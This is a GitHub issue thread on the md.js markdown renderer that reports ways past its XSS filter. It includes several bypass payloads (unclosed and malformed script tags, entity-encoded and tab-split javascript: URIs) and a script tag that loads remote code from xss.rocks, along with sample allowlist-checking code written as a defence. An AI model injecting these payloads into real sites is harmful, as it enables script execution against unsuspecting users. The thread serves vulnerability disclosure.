
More XSS

Open · Zolmeister opened this issue 8 years ago · 1 comment

https://github.com/thysultan/md.js/issues/1

script tag without closing tag

<script src="data:,alert(1)">

script tag with non-plain closing tag

<script>alert(1)</script >

hex html encoded (with and without semicolons) javascript:

<iframe src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>

embedded tab to break up javascript:

<iframe src="java	script:alert(1)">

There may be more; check out https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

My recommendation would be to avoid using regex and instead opt for manual token parsing (or just remove all HTML support...). Whitelists are great too.

Zolmeister · Aug 14 '17 04:08
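As an added example (not md.js code, nor the reporter's), here are the two allowlist checks the issue recommends instead of regex filtering, written so that the evasions listed above are rejected: a tag allowlist decided by tag name alone, and a URL scheme allowlist applied only after entity decoding and control-character stripping. The allowed tag and scheme sets are assumptions for illustration.

```javascript
// Added example, not md.js code: allowlist checks instead of a regex XSS filter.

// Assumed allowlists (illustrative): tags the renderer may emit, and URL
// schemes accepted in href/src. Relative URLs are accepted as well.
const ALLOWED_TAGS = new Set(["a", "b", "i", "em", "strong", "code", "pre",
                              "p", "ul", "ol", "li", "blockquote", "img"]);
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Tag name at the start of a raw fragment such as "<script src=x>" or
// "</script >". The name ends at whitespace, "/" or ">", so a closing tag
// with a trailing space is still recognised as "script". The decision never
// depends on finding a matching closing tag, so "<script src=...>" with no
// "</script>" is caught too.
function tagNameOf(fragment) {
  const m = /^<\/?([a-zA-Z][^\s/>]*)/.exec(fragment);
  return m ? m[1].toLowerCase() : null;
}

function isAllowedTag(fragment) {
  const name = tagNameOf(fragment);
  return name !== null && ALLOWED_TAGS.has(name);
}

// Decode numeric character references, decimal (&#106;) and hex (&#x6A;),
// with or without the trailing semicolon, which browsers also accept.
function decodeNumericEntities(value) {
  return value.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, code) => {
    const cp = /^x/i.test(code) ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

// Scheme check on the normalised value: entities decoded, then every ASCII
// control character and space removed. Browsers strip only tab/CR/LF and
// leading/trailing controls; removing all of them is stricter, which can
// only turn an accept into a reject (fails closed). Note that a plain
// "http://..." passes this check, so "<script src=http://...>" must be
// stopped by isAllowedTag, not by the URL check.
function isSafeUrl(rawAttrValue) {
  const url = decodeNumericEntities(rawAttrValue).replace(/[\u0000-\u0020\u007f]/g, "");
  const colon = url.indexOf(":");
  if (colon === -1) return true;                 // no scheme: relative URL
  const scheme = url.slice(0, colon);
  if (/[\/?#]/.test(scheme)) return true;        // "/a:b", "?x=y:z": still relative
  return ALLOWED_SCHEMES.has(scheme.toLowerCase());
}
```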

It also fails:

<script src=http://xss.rocks/xss.js></script>

IMHO the best option is following the "do one thing and do it well" philosophy: make it work only as a markdown renderer and remove the XSS filter.

qgustavor · May 10 '18 21:05